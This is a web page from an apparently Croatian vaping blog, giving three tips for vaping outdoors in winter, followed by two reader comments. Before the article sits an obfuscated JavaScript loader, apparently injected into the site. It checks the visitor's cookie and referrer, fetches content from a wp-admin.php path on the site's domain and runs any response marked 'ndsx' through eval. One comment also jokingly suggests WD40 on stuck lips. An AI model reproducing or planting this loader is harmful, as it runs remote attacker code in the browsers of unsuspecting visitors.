;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Tri savjeta za parenje u zimskim uvjetima

Tri savjeta za parenje u zimskim uvjetima

Strastveni vaperi ne prestaju pariti samo zato što je došlo hladno vrijeme. Međutim, mudri prilagođavaju način na koji pare vani kako bi uzeli u obzir niže temperature i vremenske uvjete koji možda neće uvijek ići na ruku e-tekućini, bateriji ili usnama.

Samo nekoliko jednostavnih prilagodbi, i parenje na otvorenom tijekom zimske sezone možete učiniti skoro jednako ugodnim kao i ostatkom godine.

Ispod je nekoliko savjeta za sigurnije parenje na otvorenom pri hladnim temperaturama.

Imajte na umu da je parenje vrlo osobno iskustvo. Ovdje ponuđeni savjeti samo su općenite prirode, osmišljeni kako bi vam pomogli da uživate u najboljem mogućem iskustvu vapea. Slobodno upotrijebite vlastite strategije parenja kako bi vaše iskustvo bilo još više prilagođeno vašim osobnim potrebama.

Držite mod na toplom (unutrašnji džep jakne uz tijelo i sl)

Vaša e cigareta vaš je ključ za kvalitetnu paru. Tijekom zimskih mjeseci učinite sve da se ugrije kada se ne koristi. Dva su razloga za to.

Prvo, iako e-tekućina ima nižu točku ledišta od vode i vjerojatno je da se neće smrznuti, hladnije temperature i dalje uzrokuju njezino zgušnjavanje. To bi vašem atomizeru moglo stvoriti malo problema u ekstremno hladnim danima. Držanje uređaja u toplom džepu ublažit će svaku zabrinutost zbog hladnih temperatura i spriječiti da vaša e tekućina postane pregusta.

Još jedan razlog da svoj uređaj držite toplim je jednostavna činjenica da hladnije temperature smanjuju trajanje baterije. Baterija će dulje trajati što je više uređaj na toplom.

Koristite dobar balzam za usne

Opće je poznato da hladne temperature nisu dobre za usne. Vaperi imaju dodatnu potrebu zaštite usana koje nisu izložene samo hladnom zraku, već i hladnom vrhu uređaja za parenje; drip tip. Taj hladni vrh može dovesti do suhih usnica koje pucaju i ljušte se. Očito je rješenje koristiti dobar balzam za usne.

U posebno hladnim danima kada se temperature spuštaju duboko isod nule, dobro je osigurati da usne ostanu suhe dok parite. Mokre usne mogu se zalijepiti za vrh vašeg uređaja za vaping u jako hladnim danima s ekstremnim hladnim vjetrom. Ako vam se uređaj za parenje “zaglavi”, zaljepi na usnama, budite vrlo oprezni pri odljepljivanju sa usana!

Izbjegavajte preduge puffove, povlačenja

Hladnije temperature utječu na iskustvo parenja smanjenjem vrućine pare i udara u grlo. Drugim riječima, toplina koju vaš raspršivač obično generira kada vučete paru može biti osjetno manja pri hladnom vremenu. To je prirodni rezultat naleta hladnog zraka na vaš uređaj.

Nadalje, doživjet ćete smanjeni udarac u grlo, troath hit, jer temperatura zagrijavanja coila nije tako jaka. Što god radili, izbjegavajte korištenje predugih povlačenja, puffova, kako biste nadoknadili manje vrućine i smanjeni udarac u grlu. Predugo povlačenje na niskim temperaturama smanjit će vijek trajanja baterije i grijača. Također ćete na kraju potrošiti više e-tekućine po povlačenju nego što ste navikli.

Imate li vi kakav savjet za dodati? Napišite u komentarima!

Vidimo se u live streamu u petak na Vaper Pub Youtube kanalu!

Choose your Reaction!
  • Dva poda koristiti, losija, koji se vise griju… Naizmjenicno povlaciti i drzati im temperaturu na nivou za grijanje prstiju u dzepovima 😁

  • Ako se usnik zalipi za usne, koristiti WD40, toplu vodu ili zamoliti nekoga da se popiša. Sve tri opcije će bezbolno odvojiti usnik od usana. Eto nekoliko hintova za taj slučaj

Leave a Comment